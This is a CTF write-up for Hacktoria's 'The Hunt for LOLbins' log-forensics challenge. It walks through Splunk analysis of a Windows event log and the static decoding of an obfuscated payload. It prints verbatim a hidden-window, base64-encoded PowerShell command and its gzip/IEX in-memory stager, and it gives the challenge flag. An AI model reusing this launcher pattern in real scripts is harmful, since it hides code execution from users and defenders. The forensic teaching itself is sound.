CTF Writeup: Hacktoria Contract: The Hunt for LOLbins

Introduction

While most of the CTF challenges on Hacktoria focus on OSINT, there have been a number of blue-team ones created by the community recently. After solving this , 
 

The challenge briefing on Hacktoria

Challenge Info

Name: The Hunt for LOLbins

Category: Log Files

Challenge Creator: BoΠeShΔdϴw³

Challenge description:

Greetings, Special Agent K.

Intelligence from our S.I.S.U unit tipped us off to a plot by Ahemait to infiltrate our systems, with the assistance of our Red Team and A.S.I.C units we were able to setup a “Honey Pot” before they attempted to breach us, we allowed for a segregated portion of our network to be purposely infected by one of Ahemait’s USB sticks, once they initiate a connection we can then trace them and reverse the code, modify it and then use their own malicious code against them. Your task is to trawl through the Event Logs and locate the suspicious entries, and then analyse and reverse them to work out what the final result is.

As always, Special Agent K. The Contract is yours, if you choose to accept.

Link to challenge files: https://hacktoria.com/contracts/the-hunt-for-lolbins/ (Contains backstory and challenge file: WinEvents.evtx)

Setup

WinEvents.evtx is a Windows Event Log file. You can view it (and use some limited searching functions) with the built-in Windows Event Log Viewer application, that comes with every Windows computer.

However, I will be solving this challenge with the help of Splunk. There are a few advanced searching and visualization functions that can really speed up the analysis process. If you don't have a Splunk server yet, I've written a short Splunk setup guide.

For Splunk to be able to parse Windows Event Logs, you have to install the server on a Windows system. I recommend a Virtual Machine.

You can upload the evtx file using Splunk's web interface

Check that the sourcetype is set to "preprocess-winevt". Don't worry if the logs look a little messed up at this stage.

Complete the remaining steps to finish importing the logs into Splunk

Solving the challenge

In the CTF context, analyzing a log file typically takes two main steps:

1. Identifying suspicious or anomalous log entries
2. Extracting or decoding the data in those entries

I like to start by looking at a sample log entry, and noting down any interesting fields I can use in my search queries.

For Windows Event logs, the EventCode/Event ID shows the general category for each log entry.

A few event log ids and their meanings, from https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx?i=j

Based on my past experience, Event ID 7001 is not very common. According to this Eventlog lookup website, it is only produced on Win2008 computers. From just the first log entry, we have already identified the machine's OS version.

The User and Computer fields are usually helpful, since they can help us map out the different computers and people in the network. In this case however, all logs came from a single machine, and there were no interesting usernames.

Finally, the SourceName field can reveal what applications or services were producing logs (and therefore were running) on the machine.

Listing the different SourceNames in the log file

SourceNames that include "Microsoft-Windows" are likely legitimate. However, one source "BKyz" looks suspicious. Let's find out what event codes are associated with the BKyz SourceType.

All the events have the event code 1337. In CTFs, the number 1337 is another indicator that something is amiss. For a more detailed explanation of 1337's significance, check out this article. 

Instead of modifying our Splunk search query, we can just click on the row, and select "View events"  to investigate events from that source type.

All 10 rows from the BKyz source include a suspicious encoded command:

%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand

JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAE0AbABQAFEAbQBRAEEALwAzADEAVAB3AFcAcQBGAE0AQgBDADgAQgAvAEkAUABDADgAOQBpAHkANgBOAGcAYgBGAEwAcgA0AFUASAAvAFEAMABTAEMAVwBtAHUAUgBDAE4ARwBlADIAdgA2ADcAcwBaAGIAaQBMAEsAaQAzAGMAUwBhAHoAawAzAEcAOQBVAEQAMAAyAGIAVABYAE4AMQBzADkAUwBTAEIARgBaADcAKwBsAEcAcgAvAGMAUABnAEsAUwBnADgAQgBUADEAdQAvAFYAbABsAHUANgBSAEEAWgBUAG4AZQA2AFMAUwBEAEsAQgA2ADMAawBQADkAZwBxAFQARwBvAHcAWgA4ADAAUwBoADkATwBpAFoATgBjAGgAegBQAHEATwBNAEEAcQBGAFEASgAyAEQAQwBvAEkAWgB5AEcAUwArAE4AOABOAGcATwBTAG8AZwB1AGYAagA4AEYAWgBHAGkARABSAGgANwBWAHgAMQBnADAAMABmAHUAbwBDAHYAUwBHAEgAdAAyAGQAZABZAEUANwA4ADQATwB5AEcATQBJAEwARgBoAHIAMQBCAFQAcQBVAGgAOQA3AGEAcwBiADQAUAB0AHcAcgBaAEcANwBuAE0AWQAvAHIAZgAzAG0AKwA3AG8AYQB6AHUAdwBDAGEANQBCAFUAZABIAGoAeAA5AGcANwBpAG0ATQBwAGYAbABaAHAATQBjADIAKwBkADEAMwA1AEsAMQBsAGYALwBQADAAWAByAFcAcwBXAHIAUgBlAFAAKwBpAEkARABBAEEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA

Breaking down the key components of this command:

1. %COMPSPEC% is a Windows environment variable that points to (and would be replaced by) cmd.exe, the command prompt. 
2. "start" causes command prompt to execute another program. In this case, powershell.
3. Powershell opens in a hidden window (due to the -w hidden) flag.
4. -"encodedcommand" executes a base64-encoded string.

The next step of solving this challenge will be to reverse the encoded powershell command. One option would be to try running the command in Powershell and observing the output (for safety reasons, please do this in a virtual machine). However, I will try to reverse it statically (without executing the script), so I can point out a few common tricks.

Simply base64 decoding in CyberChef produces a few errors.

However, it can easily be fixed by converting to hex, filtering, and converting back.

The base64-encoded command decodes to:

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAMlPQmQA/31TwWqFMBC8B/IPC89iy6NgbFLr4UH/Q0SCWmuRCNGe2v67sZbiLKi3cSazk3G9UD02bTXN1s9SSBFZ7+lGr/cPgKSg8BT1u/Vllu6RAZTne6SSDKB63kP9gqTGowZ80Sh9OiZNchzPqOMAqFQJ2DCoIZyGS+N8NgOSogufj8FZGiDRh7Vx1g00fuoCvSGHt2ddYE784OyGMILFhr1BTqUh97asb4PtwrZG7nMY/rf3m+7oazuwCa5BUdHjx9g7imMpflZpMc2+d135K1lf/P0XrWsWrReP+iIDAAA="));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

Here, we can see another base64-encoded string, that is read by FromBase64String, and then decompressed with IO.Compression.GzipStream. IEX executes the string as code. We can replicate this next step again with CyberChef.

...

Click here to view the full output

Now, we can see that an array of characters is created, decoded, and printed out as the flag. Keeping with my aim of fully reversing the payload, one way of finding the flag is to re-implement the script in Python, or your favorite scripting language.

However, we've had so much fun with CyberChef, so let's decode it with CyberChef instead.

Click here to play around with the recipe

And we have our flag: H4ckt0ria{a24304dd-1209-4f2f-a926-a3a1140f3989}. Use this to unzip the flagfile, and we are rewarded with another cool challenge card. 

Conclusion

Thanks again to BoΠeShΔdϴw³ for creating this challenge. If you're interested in another blue team challenge from Hacktoria, check out my writeup for this Office Document forensics challenge. You can find all the log file challenges from Hacktoria here.

Update: My writeup was reviewed on the official Hacktoria YouTube channel! Watch this video to see Frank, founder of Hacktoria, go over community writeups for this challenge.